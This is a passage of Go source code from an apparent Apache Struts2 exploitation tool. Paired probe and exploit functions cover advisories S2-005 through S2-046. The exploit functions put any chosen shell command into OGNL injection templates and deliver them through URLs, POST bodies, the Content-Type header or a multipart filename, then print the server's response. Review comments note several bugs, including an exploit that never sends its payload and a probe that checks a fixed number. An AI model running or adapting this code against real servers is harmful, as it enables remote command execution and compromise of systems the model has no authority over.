strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1) 251 | Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1) 252 | Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1) 253 | resp, err := client.R(). 
254 | Get(Payload) 255 | if err != nil { 256 | 257 | } 258 | if resp != nil { 259 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 260 | fmt.Println("替换Payload在检测一次") 261 | } else { 262 | Payload = c.Url + utils.Exec_payload2 263 | Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1) 264 | Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1) 265 | Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1) 266 | resp, err = client.R(). 267 | Get(Payload) 268 | if err != nil { 269 | 270 | } 271 | if resp != nil { 272 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 273 | color.Red("*Found Struts2-005!") 274 | } else { 275 | fmt.Println("Struts2-005 Not Vulnerable.") 276 | } 277 | } 278 | } 279 | } 280 | } 281 | 282 | func (c *WorkExp) ExpS005Cmd() { 283 | Payload := c.Url + utils.Exec_payload1 284 | Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1) 285 | resp, err := client.R(). 286 | Get(Payload) 287 | if err != nil { 288 | 289 | } 290 | if resp != nil { 291 | fmt.Println(resp.String()) 292 | } 293 | 294 | Payload = c.Url + utils.Exec_payload2 295 | Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1) 296 | resp, err = client.R(). 297 | Get(Payload) 298 | if err != nil { 299 | 300 | } 301 | if resp != nil { 302 | fmt.Println(resp.String()) 303 | } 304 | } 305 | 306 | func (c *WorkExp) ExpS005GetPath() { 307 | Payload := c.Url + utils.Web_path 308 | resp, err := client.R(). 
309 | Get(Payload) 310 | if err != nil { 311 | 312 | } 313 | if resp != nil { 314 | fmt.Println(resp.String()) 315 | } 316 | } 317 | 318 | // PocS007 S2-007:影响版本Struts 2.0.0-2.2.3; POST请求发送数据; 默认参数为:username,password; 319 | func (c *WorkExp) PocS007() { 320 | var ( 321 | resp *req.Response 322 | err error 323 | ) 324 | r1 := rand.Intn(10000) + 1000 325 | r2 := rand.Intn(10000) + 1000 326 | Payload := strings.Replace(utils.ExecPayload007, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1) 327 | Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1) 328 | Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1) 329 | if c.postData == "" { 330 | c.postData = "username=" + Payload 331 | } else { 332 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 333 | } 334 | if c.contentType == "" { 335 | resp, err = client.R(). 336 | SetBody(c.postData). 337 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 338 | Post(c.Url) 339 | } else { 340 | resp, err = client.R(). 341 | SetBody(c.postData). 342 | SetHeader("Content-Type", c.contentType). 343 | Post(c.Url) 344 | } 345 | if err != nil { 346 | 347 | } 348 | if resp != nil { 349 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 350 | color.Red("*Found Struts2-007!") 351 | } else { 352 | if c.postData == "" { 353 | c.postData = "password=" + Payload 354 | } else { 355 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 356 | } 357 | if c.contentType == "" { 358 | resp, err = client.R(). 359 | SetBody(c.postData). 360 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 361 | Post(c.Url) 362 | } else { 363 | resp, err = client.R(). 364 | SetBody(c.postData). 365 | SetHeader("Content-Type", c.contentType). 
366 | Post(c.Url) 367 | } 368 | if err != nil { 369 | 370 | } 371 | if resp != nil { 372 | if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) { 373 | color.Red("*Found Struts2-007!") 374 | } else { 375 | fmt.Println("Struts2-007 Not Vulnerable.") 376 | } 377 | } 378 | } 379 | } 380 | } 381 | 382 | func (c *WorkExp) ExpS007Cmd() { 383 | var ( 384 | resp *req.Response 385 | err error 386 | ) 387 | Payload := strings.Replace(utils.ExecPayload007, "{cmd}", c.Cmd, -1) 388 | if c.postData == "" { 389 | c.postData = "username=" + Payload 390 | } else { 391 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 392 | } 393 | if c.contentType == "" { 394 | resp, err = client.R(). 395 | SetBody(c.postData). 396 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 397 | Post(c.Url) 398 | } else { 399 | resp, err = client.R(). 400 | SetBody(c.postData). 401 | SetHeader("Content-Type", c.contentType). 402 | Post(c.Url) 403 | } 404 | if err != nil { 405 | 406 | } 407 | if resp != nil { 408 | fmt.Println(resp) 409 | } 410 | 411 | if c.postData == "" { 412 | c.postData = "password=" + Payload 413 | } else { 414 | c.postData = strings.Replace(c.postData, "{exp}", Payload, -1) 415 | } 416 | if c.contentType == "" { 417 | resp, err = client.R(). 418 | SetBody(c.postData). 419 | SetHeader("Content-Type", "application/x-www-form-urlencoded"). 420 | Post(c.Url) 421 | } else { 422 | resp, err = client.R(). 423 | SetBody(c.postData). 424 | SetHeader("Content-Type", c.contentType). 
		Post(c.Url)
	}
	if err != nil {

	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS008 S2-008: affected versions Struts 2.1.0-2.3.1; data is sent via a GET request.
// Probe logic shared by most PoC* methods below: the injected command echoes the sum of two
// random numbers, and the target is reported as vulnerable only if that sum appears in the
// response body. The marker itself (the `expr` call and the two numbers) is what this tool
// leaves in server logs.
func (c *WorkExp) PocS008() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload008
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-008!")
		} else {
			fmt.Println("Struts2-008 Not Vulnerable.")
		}
	}
}

// ExpS008Cmd substitutes c.Cmd into the S2-008 template and prints the raw response body.
func (c *WorkExp) ExpS008Cmd() {
	Payload := c.Url + utils.ExecPayload008
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS009 S2-009: affected versions Struts 2.0.0-2.3.1.1; data is sent via a GET request and the
// URL needs a request parameter name appended; default: key.
// NOTE(review): this method rewrites c.Url and c.postData in place, so the appended query string
// is still present for every method that runs afterwards on the same receiver (see the allPoc
// case in Run).
func (c *WorkExp) PocS009() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload009
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	if c.postData == "" {
		// no parameter name supplied: fall back to "key" and note that Payload already
		// starts with c.Url, so the base URL ends up in the request twice
		c.postData = "?key=" + Payload
		c.Url = c.Url + c.postData
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
		c.Url = c.Url + c.postData
	}
	resp, err := client.R().
		Get(c.Url)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-009!")
		} else {
			fmt.Println("Struts2-009 Not Vulnerable.")
		}
	}
}

// ExpS009Cmd builds the S2-009 template with c.Cmd and prints the response body.
// NOTE(review): as written, Payload is computed but the GET is issued against c.Url unchanged,
// so the computed value never leaves this function; the behaviour differs from ExpS008Cmd.
func (c *WorkExp) ExpS009Cmd() {
	Payload := c.Url + utils.ExecPayload009
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(c.Url)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS012 S2-012: affected versions Struts Showcase App 2.0.0-2.3.13; data is sent via a GET
// request with the parameter appended directly to the URL; default: name; supports arbitrary
// command execution.
// NOTE(review): like PocS009 this rewrites c.Url and c.postData in place; the mutation is
// visible to later calls on the same receiver.
func (c *WorkExp) PocS012() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.ExecPayload012, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	if c.postData == "" {
		c.postData = "?name=" + Payload
		c.Url = c.Url + c.postData
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
		c.Url = c.Url + c.postData
	}
	resp, err = client.R().
		Get(c.Url)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-012!")
		} else {
			fmt.Println("Struts2-012 Not Vulnerable.")
		}
	}
}

// ExpS012Cmd POSTs c.postData (with {exp} replaced by the S2-012 template carrying c.Cmd) and
// prints the response body. Unlike PocS012 no default parameter name is supplied, so an empty
// c.postData results in an empty request body.
func (c *WorkExp) ExpS012Cmd() {
	var (
		resp *req.Response
		err  error
	)
	Payload := strings.Replace(utils.ExecPayload012, "{cmd}", c.Cmd, -1)
	c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS013 S2-013/S2-014: affected versions Struts 2.0.0-2.3.14.1; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
func (c *WorkExp) PocS013() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload013
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-013!")
		} else {
			fmt.Println("Struts2-013 Not Vulnerable.")
		}
	}
}

// ExpS013Cmd substitutes c.Cmd into the S2-013 template and prints the response body.
func (c *WorkExp) ExpS013Cmd() {
	Payload := c.Url + utils.ExecPayload013
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS013GetPath requests the S2-013 web-path template and prints the response body.
func (c *WorkExp) ExpS013GetPath() {
	Payload := c.Url + utils.WebPath013
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS015 S2-015: affected versions Struts 2.0.0-2.3.14.2; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
// NOTE(review): unlike the other probes, the verdict compares the body against the literal
// "6308" rather than strconv.Itoa(r1+r2); r1 and r2 are still embedded in the request but do
// not influence the result.
func (c *WorkExp) PocS015() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload015
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), "6308") {
			color.Red("*Found Struts2-015!")
		} else {
			fmt.Println("Struts2-015 Not Vulnerable.")
		}
	}
}

// ExpS015Cmd substitutes c.Cmd into the S2-015 template and prints the response body.
func (c *WorkExp) ExpS015Cmd() {
	Payload := c.Url + utils.ExecPayload015
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS016 S2-016: affected versions Struts 2.0.0-2.3.15; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
// PocS016 requires the target URL to carry an action, e.g. http://xxx.com/xxx.action
// Three template variants (ExecPayload016a/b/c) are tried in turn with the same r1/r2 marker;
// each variant prints its own verdict.
func (c *WorkExp) PocS016() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload016a
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-016!-> ExecPayload016a")
		} else {
			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016a ")
		}
	}

	// variant b
	Payload = c.Url + utils.ExecPayload016b
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-016!-> ExecPayload016b")
		} else {
			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016b")
		}
	}

	// variant c
	Payload = c.Url + utils.ExecPayload016c
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-016!-> ExecPayload016c")
		} else {
			fmt.Println("Struts2-016 Not Vulnerable. -> ExecPayload016c")
		}
	}
}

// ExpS016Cmd sends c.Cmd through all three S2-016 template variants and prints each response
// body in turn.
func (c *WorkExp) ExpS016Cmd() {
	Payload := c.Url + utils.ExecPayload016a
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	Payload = c.Url + utils.ExecPayload016b
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}

	Payload = c.Url + utils.ExecPayload016c
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err = client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS016GetPath requests the S2-016 web-path template and prints the response body.
func (c *WorkExp) ExpS016GetPath() {
	Payload := c.Url + utils.WebPath016
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS019 S2-019: affected versions Struts 2.0.0-2.3.15.1; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
func (c *WorkExp) PocS019() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	reqUrl := c.Url + utils.ExecPayload019
	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-019!")
		} else {
			fmt.Println("Struts2-019 Not Vulnerable.")
		}
	}
}

// ExpS019Cmd substitutes c.Cmd into the S2-019 template and prints the response body.
func (c *WorkExp) ExpS019Cmd() {
	reqUrl := c.Url + utils.ExecPayload019
	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS019GetPath requests the S2-019 web-path template and prints the response body.
func (c *WorkExp) ExpS019GetPath() {
	Payload := c.Url + utils.WebPath019
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS029 S2-029: affected versions Struts 2.0.0-2.3.24.1 (except 2.3.20.3); data is sent via a
// POST request and a parameter is required; default parameter: message; supports arbitrary
// command execution.
// NOTE(review): c.postData is rewritten in place and stays set for later calls on the same
// receiver.
func (c *WorkExp) PocS029() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.ExecPayload029, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	if c.postData == "" {
		c.postData = "message=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-029!")
		} else {
			fmt.Println("Struts2-029 Not Vulnerable.")
		}
	}
}

// ExpS029Cmd POSTs the S2-029 template carrying c.Cmd (default parameter: message) and prints
// the response body.
func (c *WorkExp) ExpS029Cmd() {
	var (
		resp *req.Response
		err  error
	)
	Payload := strings.Replace(utils.ExecPayload029, "{cmd}", c.Cmd, -1)
	if c.postData == "" {
		c.postData = "message=" + Payload
	} else {
		c.postData = strings.Replace(c.postData, "{exp}", Payload, -1)
	}
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "application/x-www-form-urlencoded").
			Post(c.Url)
	} else {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", c.contentType).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS032 S2-032: affected versions Struts 2.3.20-2.3.28 (except 2.3.20.3 and 2.3.24.3); data is
// sent via a GET request; supports fetching the web path and arbitrary command execution.
// The probe uses utils.CheckPoc032, while ExpS032Cmd uses utils.ExecPayload032.
func (c *WorkExp) PocS032() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	reqUrl := c.Url + utils.CheckPoc032
	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-032!")
		} else {
			fmt.Println("Struts2-032 Not Vulnerable.")
		}
	}
}

// ExpS032Cmd substitutes c.Cmd into the S2-032 template and prints the response body.
func (c *WorkExp) ExpS032Cmd() {
	reqUrl := c.Url + utils.ExecPayload032
	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS032GetPath requests the S2-032 web-path template and prints the response body.
func (c *WorkExp) ExpS032GetPath() {
	reqUrl := c.Url + utils.WebPath032
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS033 S2-033: affected versions Struts 2.3.20-2.3.28 (except 2.3.20.3 and 2.3.24.3); data is
// sent via a GET request; supports arbitrary command execution.
func (c *WorkExp) PocS033() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	reqUrl := c.Url + utils.CheckPoc033
	reqUrl = strings.Replace(reqUrl, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	reqUrl = strings.Replace(reqUrl, "{{r1}}", strconv.Itoa(r1), -1)
	reqUrl = strings.Replace(reqUrl, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-033!")
		} else {
			fmt.Println("Struts2-033 Not Vulnerable.")
		}
	}
}

// ExpS033Cmd substitutes c.Cmd into the S2-033 template and prints the response body.
func (c *WorkExp) ExpS033Cmd() {
	reqUrl := c.Url + utils.ExecPayload033
	reqUrl = strings.Replace(reqUrl, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(reqUrl)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS037 S2-037: affected versions Struts 2.3.20-2.3.28.1; data is sent via a GET request;
// supports fetching the web path and arbitrary command execution.
func (c *WorkExp) PocS037() {
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := c.Url + utils.ExecPayload037
	Payload = strings.Replace(Payload, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-037!")
		} else {
			fmt.Println("Struts2-037 Not Vulnerable.")
		}
	}
}

// ExpS037Cmd substitutes c.Cmd into the S2-037 template and prints the response body.
func (c *WorkExp) ExpS037Cmd() {
	Payload := c.Url + utils.ExecPayload037
	Payload = strings.Replace(Payload, "{cmd}", c.Cmd, -1)
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS037GetPath requests the S2-037 web-path template and prints the response body.
func (c *WorkExp) ExpS037GetPath() {
	Payload := c.Url + utils.WebPath037
	resp, err := client.R().
		Get(Payload)
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS045 S2-045: affected versions Struts 2.3.5-2.3.31, 2.5-2.5.10; data is sent via a POST
// request, no parameter needed; supports fetching the web path and arbitrary command execution.
// The injection point is the Content-Type request header, not the body, which is why header
// inspection rather than body inspection is what surfaces this traffic.
// NOTE(review): the request is only issued when c.contentType is empty; there is no else branch,
// so with a custom content type resp stays nil and nothing is printed.
func (c *WorkExp) PocS045() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.ExecPayload045, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)

	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", Payload).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-045!")
		} else {
			fmt.Println("Struts2-045 Not Vulnerable.")
		}
	}
}

// ExpS045Cmd carries c.Cmd in the Content-Type header via the S2-045 template and prints the
// response body. As in PocS045, nothing is sent when c.contentType is set.
func (c *WorkExp) ExpS045Cmd() {
	var (
		resp *req.Response
		err  error
	)
	Payload := strings.Replace(utils.ExecPayload045, "{cmd}", c.Cmd, -1)

	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", Payload).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS045GetPath sends the S2-045 web-path template in the Content-Type header and prints the
// response body. As in PocS045, nothing is sent when c.contentType is set.
func (c *WorkExp) ExpS045GetPath() {
	var (
		resp *req.Response
		err  error
	)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", utils.WebPath045).
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// PocS046 S2-046: affected versions Struts 2.3.5-2.3.31, 2.5-2.5.10; data is sent via a POST
// request, no parameter needed; supports fetching the web path and arbitrary command execution.
// The probe is carried in the multipart filename parameter; the boundary string is fixed, so the
// same boundary value recurs in every request this tool sends.
// NOTE(review): as rendered here, the boundary and the Content-Disposition line of payload1 share
// one line separated by a space, whereas ExpS046Cmd and ExpS046GetPath put them on separate
// lines — confirm against the original file. The request is only issued when c.contentType is
// empty.
func (c *WorkExp) PocS046() {
	var (
		resp *req.Response
		err  error
	)
	r1 := rand.Intn(10000) + 1000
	r2 := rand.Intn(10000) + 1000
	Payload := strings.Replace(utils.CheckPoc046, "{cmd}", "echo `expr {{r1}} + {{r2}}`", -1)
	Payload = strings.Replace(Payload, "{{r1}}", strconv.Itoa(r1), -1)
	Payload = strings.Replace(Payload, "{{r2}}", strconv.Itoa(r2), -1)

	payload1 := `-----------------------------735323031399963166993862150 Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
{{payload}}
Content-Type: text/plain

x
-----------------------------735323031399963166993862150--`
	c.postData = strings.Replace(payload1, "{{payload}}", Payload, -1)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		if strings.Contains(resp.String(), strconv.Itoa(r1+r2)) {
			color.Red("*Found Struts2-046!")
		} else {
			fmt.Println("Struts2-046 Not Vulnerable.")
		}
	}
}

// ExpS046Cmd wraps the S2-046 template carrying c.Cmd in the fixed multipart body and prints the
// response body. The request is only issued when c.contentType is empty.
func (c *WorkExp) ExpS046Cmd() {
	var (
		resp *req.Response
		err  error
	)
	Payload := strings.Replace(utils.ExecPayload046, "{cmd}", c.Cmd, -1)

	payload1 := `-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
{{payload}}
Content-Type: text/plain

x
-----------------------------735323031399963166993862150--`
	c.postData = strings.Replace(payload1, "{{payload}}", Payload, -1)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
			Post(c.Url)
	}
	if err != nil {
		// transport errors are silently discarded
	}
	if resp != nil {
		fmt.Println(resp.String())
	}
}

// ExpS046GetPath wraps the S2-046 web-path template in the fixed multipart body and prints the
// response body. The request is only issued when c.contentType is empty.
func (c *WorkExp) ExpS046GetPath() {
	var (
		resp *req.Response
		err  error
	)
	payload1 := `-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="foo"; filename="%{(#nike='multipart/form-data').
{{payload}}
Content-Type: text/plain

x
-----------------------------735323031399963166993862150--`
	c.postData = strings.Replace(payload1, "{{payload}}", utils.WebPath046, -1)
	if c.contentType == "" {
		resp, err = client.R().
			SetBody(c.postData).
			SetHeader("Content-Type", "multipart/form-data; boundary=---------------------------735323031399963166993862150").
